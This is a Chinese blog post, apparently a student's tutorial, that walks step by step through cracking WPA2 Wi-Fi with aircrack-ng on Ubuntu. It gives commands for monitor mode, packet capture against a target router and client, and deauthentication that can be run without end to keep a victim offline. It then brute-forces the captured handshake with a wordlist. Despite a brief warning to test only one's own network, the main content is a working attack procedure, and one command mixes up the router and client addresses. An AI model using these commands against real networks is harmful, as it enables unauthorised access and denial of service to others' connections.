本文主要是介绍Wi-Fi 破解 (基于WPA2协议),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
如今信息安全越来越热门,最近搞大创项目有机会接触到了我们一直谈论的Wi-Fi破解技术,于是整理了一些关于Wi-Fi破解的东西分享给大家,包括一些Wi-Fi的基本知识。希望大家只是拿自己的Wi-Fi做实验,不要“Wi-Fi破解,从入门到入狱”噢。
首先先提出一些基本概念:
第一个概念是无线网络的攻击基本类型:
1.防御完全无效:悄无声息安全通过
2.防御存在障碍:攻击这种网络通常情况下需要一个字典,通过字典攻击拿到基于“有线等效保密协议”和“Wi-Fi保护访问的预共享密钥”
WEP:有线等效保密协议
WPA:Wi-Fi保护访问
WPA-PSK:pre-shared key(Wi-Fi保护访问下的预共享密钥)
BSSID:路由器的mac地址
目前我们普遍使用的是WPA2协议支持的Wi-Fi安全机制。就在半个月前样子,网络上就曝出了WPA2协议层出现巨大漏洞,导致用户登录网站的用户名和密码可以被破解获得,所以WPA2也不再绝对安全了。
我自己的实验是基于Linux Ubuntu 16.04 操作系统,由于系统搭建在VMWare虚拟机上,所以需要使用外接网卡,我使用的是360无线网卡(市面上随处可见)但是对于网卡有个硬件要求就是需要支持监听模式(monitor)并且在多个操作系统上都能运行。如果不支持监听模式,那么就无法抓取到受害者的Wi-Fi数据包。
Linux下的工具有很多,在本次实验中我使用aircrack-ng去抓取数据包并使用字典暴力破解。
第一部分:
安装aircrack-ng与wireshark,这个很简单,在Linux命令行下直接输入这两个软件的名字,按照提示使用apt-get即可。
为了方便,先在命令行输入:sudo su 输入用户密码获得管理员权限,这样后面开启监听模式就不会遇到权限不够等问题。并且使用iwconfig查看是否读取到网卡的数据,若出现外接网卡的数据说明连接成功。然后点击右上角图标将Wi-Fi关闭。
此处的外接360网卡名字为wlx0087
第二部分:
不废话直接上指令:
以下是基于Linux操作系统的aircrack-ng操作命令
1. 需要先关闭Wi-Fi,将无线网卡的模式调至monitor
iwconfig wlx0087 mode monitor
2.打开无线网卡的监听模式
airmon-ng start wlx0087 6
3.kill PID 杀死多余进程
kill PID pid_num
4.关闭防火墙
rfkill unblock all
5. 使用mon0 -9 是数据包注入测试
aireplay-ng -9 mon0
假设AB:CD:EF:GH:IJ:KL为路由器的MAC地址,MN:OP:QR:ST:UV:WX为你要攻击的用户MAC地址······
6. 开始抓包,并将数据存储到output为名字的文件里,一般保存在当前目录
airodump-ng -c 6 --bssid AB:CD:EF:GH:IJ:KL -w output mon0
7. 使用户掉线重连,用于抓取握手包
aireplay-ng -0 1 -a AB:CD:EF:GH:IJ:KL -c MN:OP:QR:ST:UV:WX mon0
小TIP:此处的命令若改成sudo aireplay-ng --deauth 1/0(0表示无限次) -a AB:CD:EF:GH:IJ:KL(指定基本服务集标识) -c MN:OP:QR:ST:UV:WX(指定目标地址) mon0
deauth后面的参数设置成0,这意味着数据包的无限注入,这样如果黑客不停止数据包注入,你将永远连不上自己的Wi-Fi并始终处于掉线模式,经过实验发现我自己的苹果手机是可以被攻击的。
8. 使用字典开始暴力破解
aircrack-ng -w dict.txt -b MN:OP:QR:ST:UV:WX output*.cap
所谓字典dict.txt就是含有众多密码的记事本,这个可以去GitHub上进行搜索,也可以自己制作一本。
以上就是我进行的Wi-Fi攻击破解实验操作步骤,有些地方可能还不完善,希望各位大佬提出意见,我后面也会放入实验图片继续完善这篇博文(小笔记) :)
喜欢的话别忘了关注微信公众号噢~分享技术干货的地方!
这篇关于Wi-Fi 破解 (基于WPA2协议)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!